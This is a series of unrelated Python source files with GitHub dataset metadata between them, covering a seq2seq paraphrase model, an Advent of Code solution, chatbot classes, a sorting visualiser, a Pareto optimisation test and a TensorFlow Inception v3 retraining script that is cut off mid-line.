_prepare_attended_input(\n self,\n decoder_hidden_state: torch.LongTensor = None,\n encoder_outputs: torch.LongTensor = None,\n encoder_outputs_mask: torch.LongTensor = None,\n ) -> torch.Tensor:\n \"\"\"Apply attention over encoder outputs and decoder state.\"\"\"\n # Ensure mask is also a FloatTensor. Or else the multiplication within\n # attention will complain.\n # shape: (batch_size, max_input_sequence_length)\n encoder_outputs_mask = encoder_outputs_mask.float()\n\n # shape: (batch_size, max_input_sequence_length)\n input_weights = self._attention(\n decoder_hidden_state, encoder_outputs, encoder_outputs_mask\n )\n\n # shape: (batch_size, encoder_output_dim)\n attended_input = util.weighted_sum(encoder_outputs, input_weights)\n\n return attended_input\n\n @staticmethod\n def _get_loss(\n logits: torch.LongTensor,\n targets: torch.LongTensor,\n target_mask: torch.LongTensor,\n ) -> torch.Tensor:\n\n # shape: (batch_size, num_decoding_steps)\n relevant_targets = targets[:, 1:].contiguous()\n\n # shape: (batch_size, num_decoding_steps)\n relevant_mask = target_mask[:, 1:].contiguous()\n\n return util.sequence_cross_entropy_with_logits(\n logits, relevant_targets, relevant_mask\n )\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n all_metrics: Dict[str, float] = {}\n if self._bleu and not self.training:\n all_metrics.update(self._bleu.get_metric(reset=reset))\n return all_metrics\n","repo_name":"facebookresearch/curiosity","sub_path":"curiosity/paraphrase_models.py","file_name":"paraphrase_models.py","file_ext":"py","file_size_in_byte":19824,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"7878341520","text":"\"\"\" Advent of code 2017\tday 2/1\t\"\"\"\n\nfrom argparse import ArgumentParser\nfrom functools import reduce\n\ndef row(line):\n \"\"\" Count the checksum of a row \"\"\"\n elemlist = map(int, line.strip().split(\"\\t\"))\n return max(elemlist) - min(elemlist)\n\ndef solution(input_data):\n \"\"\" Solution to the problem \"\"\"\n return sum([row(line) for line in input_data.split(\"\\n\")])\n\nif __name__ == \"__main__\":\n PARSER = ArgumentParser()\n PARSER.add_argument(\"--input\", dest='input', action='store_true')\n PARSER.add_argument(\"--test\")\n ARGS = PARSER.parse_args()\n if ARGS.input:\n with(open('input.txt', 'rb')) as input_file:\n print(solution(input_file.read()))\n elif ARGS.test:\n print(solution(str(ARGS.test)))\n else:\n DEBUG = \"\"\"5\t1\t9\t5\n 7\t5\t3\n 2\t4\t6\t8\"\"\"\n print(solution(DEBUG))\n","repo_name":"budavariam/advent_of_code","sub_path":"2017/02_1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33335172724","text":"import os \r\nimport sys\r\n\r\n# add local narwhal to the module path\r\nthis_file = os.path.abspath(__file__)\r\nnarwhal_dir = os.path.join(os.path.dirname(this_file), '..')\r\nnarwhal_dir = os.path.normpath(narwhal_dir)\r\nsys.path.insert(0, narwhal_dir)\r\n\r\nfrom narwhal.nwtypes import *\r\nfrom narwhal.nwchat import *\r\nfrom stdtrees.ask import *\r\n\r\nfrom faqabout import *\r\nfrom faqanswer import *\r\n\r\nclass FAQAppChat(TChat):\r\n def __init__(self, basedata, subchats = None):\r\n\r\n self.basedata = basedata\r\n self.about = FAQAboutChat( basedata.info, basedata.phone, basedata.contact )\r\n self.answer = FAQAnswerChat( FAQAnswer(basedata.id, basedata.vocabLists) )\r\n \r\n\r\n \r\n def Read(self, text):\r\n about = self.about #for readability\r\n answer = self.answer \r\n answer.topic.clearReaders()\r\n\r\n about.caveat = ''\r\n answer.caveat = ''\r\n\r\n if about.questionPending:\r\n answer.Read(text)\r\n if answer.gof>0.5:\r\n self.caveat = answer.Write()\r\n else:\r\n about.Read(text) \r\n if about.gof>0.5:\r\n self.caveat = about.Write()\r\n else:\r\n self.caveat = \"I am sorry, I don't know about that\"\r\n about.questionPending = False\r\n else:\r\n about.Read(text)\r\n if about.questionPending: #handle question this time?\r\n answer.Read(text)\r\n if answer.gof>0.5:\r\n about.caveat = ''\r\n self.caveat = answer.Write()\r\n elif about.gof>0.5:\r\n answer.caveat = ''\r\n self.caveat = about.Write()\r\n else:\r\n self.caveat = \"I am sorry, I don't know about that\"\r\n else:\r\n self.caveat = about.Write()\r\n \r\n\r\n self.update()\r\n\r\n \r\n def Write(self):\r\n s = self.caveat\r\n return s\r\n\r\n \r\n#---------------------------------\r\nFAQGREET = 0\r\nFAQASK = 1\r\nFAQASKDETAIL = 2\r\n\r\nfaqResponse = {\r\n FAQGREET : \"ok\",\r\n FAQASK: \"I {}\",\r\n FAQASKDETAIL : \"please clarify {}\"\r\n }\r\n\r\nfaqResponseV = {\r\n FAQGREET : [],\r\n FAQASK: [],\r\n FAQASKDETAIL :[],\r\n }\r\n\r\nfaqResponder = NWTopicResponder(bResponse, bResponseV)\r\n\r\n\r\nclass FAQChat(NWDataChat):\r\n def __init__(self, topic):\r\n NWDataChat.__init__(self, topic, faqResponder)\r\n\r\n def Read(self, text):\r\n NWDataChat.Read(self,text)\r\n\r\n def update(self):\r\n x = 2","repo_name":"peterwaksman/Narwhal","sub_path":"exampleOldChatbots/faq/faqchat.py","file_name":"faqchat.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"13489423347","text":"import os\nimport re\nimport sys\nfrom src.speaker import speak\nfrom threading import Thread\n\ndata_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))), 'data')\nprint(\"Data dir: \" + data_dir)\n\n\ndef cache(fun):\n cache.response_ = {}\n\n def inner():\n if fun.__name__ not in cache.response_:\n cache.response_[fun.__name__] = fun()\n return cache.response_[fun.__name__]\n\n return inner\n\n\n@cache\ndef show_gui():\n return \"nogui\" not in map(lambda arg: arg.lower(), sys.argv)\n\n\n@cache\ndef use_epaper():\n return \"use-epaper\" in map(lambda arg: arg.lower(), sys.argv)\n\n\n@cache\ndef disable_speaker():\n return \"disable-speaker\" in map(lambda arg: arg.lower(), sys.argv)\n\n\ndef get_argument_value(argument_name: str):\n for arg in sys.argv:\n match = re.match(rf\"{argument_name}=(.*)\", arg)\n if match and len(match.groups()) > 0:\n return match.groups()[0]\n return None\n\n\ndef loud_print(text: str, speak_asynchronously: bool = False):\n print(text)\n if disable_speaker():\n return\n if speak_asynchronously:\n speaking_thread = Thread(target=lambda _text: speak(_text), args=(text,), daemon=True)\n speaking_thread.start()\n else:\n speak(text)\n","repo_name":"Aktyn/Protaktyn","sub_path":"src/common/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4622500023","text":"# Python implementation for visualizing merge sort. \r\nimport pygame \r\nimport random \r\npygame.font.init() \r\n# Total window \r\nscreen = pygame.display.set_mode((900, 650)) \r\npygame.display.set_caption(\"SORTING VISUALISER\")\r\n\r\n# Generate new Array \r\ndef generate_arr(arr_clr,clr):\r\n #intializing the array with size of array as 20\r\n array =[0]*20\r\n for i in range(1, 20):\r\n #filling color of each of box that represents each element of the array\r\n arr_clr[i]= clr[2]\r\n #filing the value in each index of the array\r\n array[i]= random.randrange(1, 100)\r\n return array\r\n\r\n\r\ndef refill(arr_clr,clr,array): \r\n\tscreen.fill((255, 255, 255)) \r\n\tdraw(arr_clr,clr,array) \r\n\tpygame.display.update() \r\n\tpygame.time.delay(20) \r\n\r\n# Sorting Algo:Merge sort \r\ndef quicksort(array, l, r,arr_clr,clr): \r\n if l[][] -> (b[c[1]][0]\n\n df_co.loc[i] = [f\"G{generation}_C{i}_CO\",\n df.loc[np.random.randint(5)][\"x\"], # A\n df.loc[np.random.randint(5)][\"y\"]] # B]\n return df_co\n\n\ndef mutation(df, n):\n df_ng_mut = pd.DataFrame(columns=['key', 'x', 'y'])\n df_ng_mut.loc[:, 'A'] = df.loc[:, \"A\"] * random.uniform(0.85, 1.5)\n df_ng_mut.loc[:, 'B'] = df.loc[:, \"B\"] * random.uniform(0.85, 1.5)\n\n key1, key2 = [], []\n for i in range(len(df_ng_mut)):\n key1.append(f\"G{n}_C{i}_M\")\n\n df_ng_mut.loc[:, 'key'] = key1\n\n return df_ng_mut\n\n\ndef chaos(f, n):\n data = {'key': [f\"G{n}_C{i}_CH\" for i in range(f)],\n 'x': random.sample(list(np.linspace(0.5, 1.5, f * 10)), f),\n 'y': random.sample(list(np.linspace(0.5, 1.5, f * 10)), f)}\n\n df = pd.DataFrame.from_dict(data)\n return df\n\n\ndef ea(self, df, obj, constraints, n):\n # optimize by page rank\n # remove the lowest ranking members\n\n # compare with global dict and remove duplicates\n compared_cols = ['x', 'y']\n if not self.df_global.empty:\n df = df.loc[~df.set_index(compared_cols).index.isin(df_global.set_index(compared_cols).index)] # this line of code removes duplicates\n\n # replace Req with tuned Req\n df[['f1', 'f2']] = [(x-1)**2 + 3*(y-1)**2, 4*x**2 + y**2 + x*y]\n\n ######################################################\n # filter by constraints\n for const in self.constraints:\n c = const.split(\" \")\n\n if c[1] == '>':\n df = df.loc[(df[f'{c[0]}'] > float(c[2]))]\n elif c[1] == '<':\n df = df.loc[(df[f'{c[0]}'] < float(c[2]))]\n elif c[1] == '<=':\n df = df.loc[(df[f'{c[0]}'] <= float(c[2]))]\n elif c[1] == '>=':\n df = df.loc[(df[f'{c[0]}'] >= float(c[2]))]\n elif c[1] == '==':\n df = df.loc[(df[f'{c[0]}'] == float(c[2]))]\n\n # update with global dataframe\n if not self.df_global.empty:\n df = pd.concat([self.df_global, df], ignore_index=True)\n\n # reset total rank\n df['total_rank'] = 0\n\n # rank shapes by objectives\n for i, obj in enumerate(self.objectives):\n\n if obj[0] == \"min\":\n df[f'rank_{obj[1]}'] = df[obj[1]].rank() * self.weights[i]\n elif obj[0] == \"max\":\n df[f'rank_{obj[1]}'] = df[obj[1]].rank(ascending=False) * self.weights[i]\n elif obj[0] == \"equal\": # define properly later\n continue\n\n # if 'total_rank' in df.columns:\n df[f'total_rank'] = df[f'total_rank'] + df[f'rank_{obj[1]}']\n\n # reorder\n ic(df)\n tot = df.pop(f'total_rank')\n ic(tot)\n df[f'total_rank'] = tot / sum(self.weights) # normalize by sum of weights\n ic(df)\n\n # order shapes by rank\n df = df.sort_values(by=['total_rank'])\n df = df.reset_index(drop=True)\n\n # pareto condition\n reorder_indx = self.pareto_front(df)\n df = df.loc[reorder_indx, :]\n df = df.reset_index(drop=True)\n ic(df)\n\n # update global\n if len(df) > self.tuneUI.sb_Max_Table_Size.value():\n # self.df_global = df.loc[0:self.tuneUI.cb_Max_Table_Size.value(), :]\n df_global = df\n else:\n df_global = df\n ic(df_global)\n\n # save dataframe\n filename = fr\"{self.projectDir}\\SimulationData\\SLANS\\Generation{n}.xlsx\"\n recursive_save(self.df_global, filename, reorder_indx)\n\n # crossover\n print(\"Crossover\")\n df_cross = crossover(df, n, self.tuneUI.sb_Crossover_Factor.value()) # , elites[\"GR/Q\n # ic(df_cross)\n\n # mutation\n print(\"Mutation\")\n df_mutation = mutation(df, n)\n # ic(df_mutation)\n\n # chaos\n print(\"Chaos\")\n df_chaos = chaos(self.tuneUI.sb_Chaos_Factor.value(), n)\n # ic(df_chaos)\n\n # take elites from previous generation over to next generation\n df_ng = pd.concat([df_cross, df_mutation, df_chaos], ignore_index=True)\n\n # update dictionary\n df = df_ng\n\n n += 1\n print(n)\n print(\"=\" * 80)\n if n < self.ng_max:\n return self.ea(n)\n else:\n return\n\n\nif __name__ == '__main__':\n\n f1_arr, f2_arr = [], []\n for x in np.linspace(-0.5, 1.5, 1000):\n for y in np.linspace(-0.5, 1.5, 100):\n f1 = (x-1)**2 + 3*(y-1)**2\n f2 = 4*x**2 + y**2 + x*y\n\n f1_arr.append(f1)\n f2_arr.append(f2)\n\n f1_p, f2_p = pareto_front(f1_arr, f2_arr)\n\n import matplotlib.pyplot as plt\n plt.scatter(f1_p, f2_p, s=5)\n plt.show()\n","repo_name":"Dark-Elektron/CavityDesignHub","sub_path":"utils/pareto_test_problem.py","file_name":"pareto_test_problem.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35577239303","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport hashlib\nimport os.path\nimport random\nimport re\nimport sys\nimport tarfile\nimport logging\n\nimport numpy as np\nimport urllib\nimport tensorflow as tf\n\nfrom tensorflow.python.framework import graph_util\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.util import compat\nfrom tensorflow.python.client import device_lib\n\n# END OF IMPORTS\n\nlogging.basicConfig(format='%(asctime)s || %(message)s')\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nSUPPORTED_EXTENSIONS = ['jpg', 'jpeg', 'JPG', 'JPEG']\nscript_dir = os.path.dirname(__file__)\n\noutputFilePath = \"simple_output.csv\"\n\n# GLOBAL FLAGS FOR TF\nFLAGS = None\n\nINCEPTION_V3_DOWNLOAD_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'\n\n# Parameters used by Inception V3\nBOTTLENECK_TENSOR_NAME = 'pool_3/_reshape:0'\nBOTTLENECK_TENSOR_SIZE = 2048\nMODEL_INPUT_WIDTH = 299\nMODEL_INPUT_HEIGHT = 299\nMODEL_INPUT_DEPTH = 3\nJPEG_DATA_TENSOR_NAME = 'DecodeJpeg/contents:0'\nRESIZED_INPUT_TENSOR_NAME = 'ResizeBilinear:0'\nMAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M\nMIN_NUM_IMAGES_PER_CLASS = 20\n\n\ndef detect_devices():\n logger.info(\"Detecting devices\")\n local_device_protos = device_lib.list_local_devices()\n gpus = [x.name for x in local_device_protos if x.device_type == 'GPU']\n cpus = [x.name for x in local_device_protos if x.device_type == 'CPU']\n if gpus:\n for g in gpus:\n logger.info(\"GPU {} detected\".format(g).upper())\n else:\n logger.info(\"NO GPU DETECTED, USING CPU\")\n for c in cpus:\n logger.info(\"CPU {} detected\".format(c))\n\n# Downloads the inception v3 model.\ndef download_inception_v3():\n logger.info(\"Attempting to download inception v3 model\")\n dest_directory = FLAGS.model_dir\n if not os.path.exists(dest_directory):\n os.makedirs(dest_directory)\n filename = INCEPTION_V3_DOWNLOAD_URL.split('/')[-1]\n filepath = os.path.join(dest_directory, filename)\n if not os.path.exists(filepath):\n # CLOSURE\n def _progress(count, block_size, total_size):\n sys.stdout.write('\\r>> Downloading %s %.1f%%' %\n (filename,\n float(count * block_size) / float(total_size) * 100.0))\n sys.stdout.flush()\n\n filepath, _ = urllib.request.urlretrieve(INCEPTION_V3_DOWNLOAD_URL,\n filepath,\n _progress)\n print()\n statinfo = os.stat(filepath)\n logger.info('Successfully downloaded', filepath, statinfo.st_size, 'bytes.')\n else:\n logger.info(\"Inception v3 model already present\")\n tarfile.open(filepath, 'r:gz').extractall(dest_directory)\n\n\n# Creates a graph with the Inception V3 model, the bottleneck, jpeg_data and resize input tensors\ndef create_inception_graph():\n logger.info(\"Loading inception graph and creating bottleneck_tensor, jpeg_data and resized_input tensors\")\n with tf.Graph().as_default() as inception_graph:\n model_filename = os.path.join(FLAGS.model_dir, 'classify_image_graph_def.pb')\n with gfile.FastGFile(model_filename, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n bottleneck_tensor, jpeg_data_tensor, resized_input_tensor = (\n tf.import_graph_def(graph_def, name='', return_elements=[\n BOTTLENECK_TENSOR_NAME, JPEG_DATA_TENSOR_NAME, RESIZED_INPUT_TENSOR_NAME]))\n return inception_graph, bottleneck_tensor, jpeg_data_tensor, resized_input_tensor\n\n\n\"\"\"\nReads the image folder and creates a dictionary with the detected labels (key)\nand lists of images split by training, testing and validation.\n\"\"\"\ndef load_images(image_dir, testing_percentage, validation_percentage):\n logger.info(\"Loading images from {} using {}% for testing and {}% for validation\".format(image_dir, str(testing_percentage) , str(validation_percentage)))\n\n if not gfile.Exists(image_dir):\n logger.info(\"Image directory '\" + image_dir + \"' not found.\")\n return None\n\n # Map variable to return\n result = {}\n\n sub_dirs = [x[0] for x in gfile.Walk(image_dir)]\n\n is_root_dir = True\n for sub_dir in sub_dirs:\n if is_root_dir:\n # Skip root directory\n is_root_dir = False\n continue\n\n file_list = []\n dir_name = os.path.basename(sub_dir)\n\n if dir_name == image_dir:\n continue\n\n logger.info(\"Looking for images in {}\".format(dir_name))\n for extension in SUPPORTED_EXTENSIONS:\n file_glob = os.path.join(image_dir, dir_name, '*.' + extension)\n file_list.extend(gfile.Glob(file_glob))\n\n if not file_list:\n logger.info('No files found')\n continue\n\n if len(file_list) < MIN_NUM_IMAGES_PER_CLASS:\n logger.warning('Folder {} has less than {} images, which may cause issues.'.format(dir_name, MIN_NUM_IMAGES_PER_CLASS))\n elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:\n logger.info('WARNING: Folder {} has more than {} images. Some images will '\n 'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))\n\n training_images = []\n testing_images = []\n validation_images = []\n label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())\n\n for file_name in file_list:\n base_name = os.path.basename(file_name)\n hash_name = re.sub(r'_nohash_.*$', '', file_name)\n hash_name_hashed = hashlib.sha1(compat.as_bytes(hash_name)).hexdigest()\n percentage_hash = (\n (int(hash_name_hashed, 16) % (MAX_NUM_IMAGES_PER_CLASS + 1)) * (100.0 / MAX_NUM_IMAGES_PER_CLASS)\n )\n\n if percentage_hash < validation_percentage:\n validation_images.append(base_name)\n elif percentage_hash < (testing_percentage + validation_percentage):\n testing_images.append(base_name)\n else:\n training_images.append(base_name)\n\n # ADD MAP ENTRY\n result[label_name] = {\n 'dir': dir_name,\n 'training': training_images,\n 'testing': testing_images,\n 'validation': validation_images,\n }\n\n # LOG\n for key in result:\n logger.info(\"Found category \" + key)\n value = result[key]\n logger.info(\"Found {} for training, {} for testing and {} for validation\".format(\n str(len(value[\"training\"])),\n str(len(value[\"testing\"])),\n str(len(value[\"validation\"]))\n ))\n\n return result\n\n\n'''\nChecks if image distortions need to be applied using:\n\n- flip_left_right: Boolean whether to randomly mirror images horizontally.\n- random_crop: Integer percentage setting the total margin used around the crop box.\n- random_scale: Integer percentage of how much to vary the scale by.\n- random_brightness: Integer range to randomly multiply the pixel values by.\n'''\ndef distort_images(flip_left_right, random_crop, random_scale, random_brightness):\n return (flip_left_right or (random_crop != 0) or (random_scale != 0) or (random_brightness != 0))\n\n'''\nFrom TF doc:\nA bottleneck is an informal term used for a layer previous to the final output layer that actually does the classification.\nThis layer has been trained to output a set of values that's good enough for the classifier to use to distinguish between all the classes it's been asked to recognize.\nIt has to be a meaningful and compact summary of the images, since it has to contain enough information for the classifier to make a good choice in a very small set of values.\n\nBecause every image is reused multiple times during training and calculating each bottleneck takes a significant amount of time,\nit speeds things up to cache these bottleneck values on disk so they don't have to be repeatedly recalculated.\nIf you rerun the script they'll be reused.\n'''\ndef determine_and_cache_bottlenecks(sess, image_lists, image_dir, bottleneck_dir, jpeg_data_tensor, bottleneck_tensor):\n logging.info(\"Determine and cache bottlenecks\")\n how_many_bottlenecks = 0\n ensure_dir_exists(bottleneck_dir)\n for label_name, label_lists in image_lists.items():\n for category in ['training', 'testing', 'validation']:\n category_list = label_lists[category]\n for index, unused_base_name in enumerate(category_list):\n get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir, category, bottleneck_dir, jpeg_data_tensor, bottleneck_tensor)\n how_many_bottlenecks += 1\n if how_many_bottlenecks % 100 == 0:\n logger.info('{} bottleneck files created for {}.'.format(str(how_many_bottlenecks), category))\n\n\ndef ensure_dir_exists(dir_name):\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\n'''\nUse existing bottleneck or create a new one.\n'''\ndef get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir, category, bottleneck_dir, jpeg_data_tensor, bottleneck_tensor):\n label_lists = image_lists[label_name]\n sub_dir = label_lists['dir']\n sub_dir_path = os.path.join(bottleneck_dir, sub_dir)\n ensure_dir_exists(sub_dir_path)\n bottleneck_path = get_bottleneck_path(image_lists, label_name, index, bottleneck_dir, category)\n\n if not os.path.exists(bottleneck_path):\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor)\n\n with open(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n\n error = False\n try:\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n except ValueError:\n logger.info('Invalid float found, recreating bottleneck')\n error = True\n\n if error:\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor)\n with open(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n\n return bottleneck_values\n\n\ndef get_bottleneck_path(image_lists, label_name, index, bottleneck_dir, category):\n return get_image_path(image_lists, label_name, index, bottleneck_dir, category) + '.txt'\n\n\ndef get_image_path(image_lists, label_name, index, image_dir, category):\n if label_name not in image_lists:\n tf.logging.fatal('Label does not exist %s.', label_name)\n\n label_lists = image_lists[label_name]\n if category not in label_lists:\n tf.logging.fatal('Category does not exist %s.', category)\n\n category_list = label_lists[category]\n if not category_list:\n tf.logging.fatal('Label %s has no images in the category %s.',\n label_name, category)\n\n mod_index = index % len(category_list)\n base_name = category_list[mod_index]\n sub_dir = label_lists['dir']\n full_path = os.path.join(image_dir, sub_dir, base_name)\n return full_path\n\n\ndef create_bottleneck_file(bottleneck_path, image_lists, label_name, index, image_dir, category, sess, jpeg_data_tensor, bottleneck_tensor):\n logger.info(\"Creating bottleneck for {} at file {}\".format(label_name, bottleneck_path))\n image_path = get_image_path(image_lists, label_name, index, image_dir, category)\n\n if not gfile.Exists(image_path):\n tf.logging.fatal('File does not exist %s', image_path)\n\n image_data = gfile.FastGFile(image_path, 'rb').read()\n try:\n bottleneck_values = run_bottleneck_on_image(sess, image_data, jpeg_data_tensor, bottleneck_tensor)\n except:\n raise RuntimeError('Error during processing file %s' % image_path)\n\n bottleneck_string = ','.join(str(x) for x in bottleneck_values)\n with open(bottleneck_path, 'w') as bottleneck_file:\n bottleneck_file.write(bottleneck_string)\n\n\n# Runs inference on an image to extract the bottleneck summary.\ndef run_bottleneck_on_image(sess, image_data, image_data_tensor, bottleneck_tensor):\n bottleneck_values = sess.run(bottleneck_tensor, {image_data_tensor: image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n return bottleneck_values\n\n'''\nAdds a new softmax layer for training in order to retrain the model to identify the specific classes.\nBased on: https://tensorflow.org/versions/master/tutorials/mnist/beginners/index.html\n'''\ndef add_new_layer(class_count, final_tensor_name, bottleneck_tensor):\n logger.info(\"Adding new layer '{}' to be trained for {} classes\".format(final_tensor_name, class_count))\n\n with tf.name_scope('input'):\n bottleneck_input = tf.placeholder_with_default( bottleneck_tensor, shape=[None, BOTTLENECK_TENSOR_SIZE], name='BottleneckInputPlaceholder')\n ground_truth_input = tf.placeholder(tf.float32, [None, class_count], name='GroundTruthInput')\n\n layer_name = 'final_training_ops'\n with tf.name_scope(layer_name):\n\n with tf.name_scope('weights'):\n initial_value = tf.truncated_normal([BOTTLENECK_TENSOR_SIZE, class_count], stddev=0.001)\n layer_weights = tf.Variable(initial_value, name='final_weights')\n variable_summaries(layer_weights)\n\n with tf.name_scope('biases'):\n layer_biases = tf.Variable(tf.zeros([class_count]), name='final_biases')\n variable_summaries(layer_biases)\n\n with tf.name_scope('Wx_plus_b'):\n logits = tf.matmul(bottleneck_input, layer_weights) + layer_biases\n tf.summary.histogram('pre_activations', logits)\n\n final_tensor = tf.nn.softmax(logits, name=final_tensor_name)\n tf.summary.histogram('activations', final_tensor)\n\n with tf.name_scope('cross_entropy'):\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=ground_truth_input, logits=logits)\n\n with tf.name_scope('total'):\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n\n tf.summary.scalar('cross_entropy', cross_entropy_mean)\n\n with tf.name_scope('train'):\n optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)\n train_step = optimizer.minimize(cross_entropy_mean)\n\n return (train_step, cross_entropy_mean, bottleneck_input, ground_truth_input, final_tensor)\n\n\ndef add_evaluation_step(result_tensor, ground_truth_tensor):\n logger.info(\"Adding evaluation step\")\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n prediction = tf.argmax(result_tensor, 1)\n correct_prediction = tf.equal( prediction, tf.argmax(ground_truth_tensor, 1))\n with tf.name_scope('accuracy'):\n evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', evaluation_step)\n return evaluation_step, prediction\n\n\n'''\nIf no distortions are applied, retrieve the cached bottleneck from disk for images.\nPick a random set of images from the specified category.\n'''\ndef get_random_cached_bottlenecks(sess, image_lists, how_many, category, bottleneck_dir, image_dir, jpeg_data_tensor, bottleneck_tensor):\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n filenames = []\n\n if how_many >= 0:\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_name = get_image_path(image_lists, label_name, image_index, image_dir, category)\n bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,\n image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor,\n bottleneck_tensor)\n ground_truth = np.zeros(class_count, dtype=np.float32)\n ground_truth[label_index] = 1.0\n bottlenecks.append(bottleneck)\n ground_truths.append(ground_truth)\n filenames.append(image_name)\n else:\n for label_index, label_name in enumerate(image_lists.keys()):\n for image_index, image_name in enumerate(\n image_lists[label_name][category]):\n image_name = get_image_path(image_lists, label_name, image_index, image_dir, category)\n bottleneck = get_or_create_bottleneck(sess, image_lists, label_name,\n image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor,\n bottleneck_tensor)\n ground_truth = np.zeros(class_count, dtype=np.float32)\n ground_truth[label_index] = 1.0\n bottlenecks.append(bottleneck)\n ground_truths.append(ground_truth)\n filenames.append(image_name)\n return bottlenecks, ground_truths, filenames\n\n\n\"\"\"\nIf distortions are applied, recalculate the full model for every image, the cached bottleneck cannot be used.\nGet random images for the requested category, run them through the distortion graph, and then the full graph to get the bottleneck results for each.\n\"\"\"\ndef get_random_distorted_bottlenecks(sess, image_lists, how_many, category, image_dir, input_jpeg_tensor, distorted_image, resized_input_tensor, bottleneck_tensor):\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_path = get_image_path(image_lists, label_name, image_index, image_dir, category)\n\n if not gfile.Exists(image_path):\n tf.logging.fatal('File does not exist %s', image_path)\n\n jpeg_data = gfile.FastGFile(image_path, 'rb').read()\n distorted_image_data = sess.run(distorted_image, {input_jpeg_tensor: jpeg_data})\n bottleneck = run_bottleneck_on_image(sess, distorted_image_data,\n resized_input_tensor,\n bottleneck_tensor)\n ground_truth = np.zeros(class_count, dtype=np.float32)\n ground_truth[label_index] = 1.0\n bottlenecks.append(bottleneck)\n ground_truths.append(ground_truth)\n return bottlenecks, ground_truths\n\n\n\"\"\" Construct a network of operations to apply them to an image.\n\n If the distortions are to be applied, apply crops, scales and brightness changes to support real world variations and, thus, have a more effective model.\n\n Cropping\n\n Place a box at a random position in the full image. The cropping parameter controls the size of that box in relation to the input image.\n - If it's zero, then the box is the same size as the input.\n - If the value is 50%, then the crop box will be half the width and height of the input.\n\n Scaling\n\n Like cropping, but the box is always centered and its size varies randomly within the given range.\n - If the scale percentage is zero, the box is the same size as the input.\n - If If it's 50%, then the box will be in a random range between half the width and height and full size.\n\n Params:\n - flip_left_right: Boolean whether to randomly mirror images horizontally.\n - random_crop: Integer percentage setting the total margin used around the crop box.\n - random_scale: Integer percentage of how much to vary the scale by.\n - random_brightness: Integer range to randomly multiply the pixel values by graph.\n \"\"\"\ndef add_input_distortions(flip_left_right, random_crop, random_scale, random_brightness):\n logger.info(\"Adding distortions. Flip: {}, crop {}%, scale {}%, brigthness {}%\".format(flip_left_right, random_crop, random_scale, random_brightness))\n jpeg_data = tf.placeholder(tf.string, name='DistortJPGInput')\n decoded_image = tf.image.decode_jpeg(jpeg_data, channels=MODEL_INPUT_DEPTH)\n decoded_image_as_float = tf.cast(decoded_image, dtype=tf.float32)\n decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n\n margin_scale = 1.0 + (random_crop / 100.0)\n resize_scale = 1.0 + (random_scale / 100.0)\n margin_scale_value = tf.constant(margin_scale)\n resize_scale_value = tf.random_uniform(tensor_shape.scalar(),\n minval=1.0,\n maxval=resize_scale)\n scale_value = tf.multiply(margin_scale_value, resize_scale_value)\n\n precrop_width = tf.multiply(scale_value, MODEL_INPUT_WIDTH)\n precrop_height = tf.multiply(scale_value, MODEL_INPUT_HEIGHT)\n precrop_shape = tf.stack([precrop_height, precrop_width])\n precrop_shape_as_int = tf.cast(precrop_shape, dtype=tf.int32)\n precropped_image = tf.image.resize_bilinear(decoded_image_4d, precrop_shape_as_int)\n precropped_image_3d = tf.squeeze(precropped_image, squeeze_dims=[0])\n cropped_image = 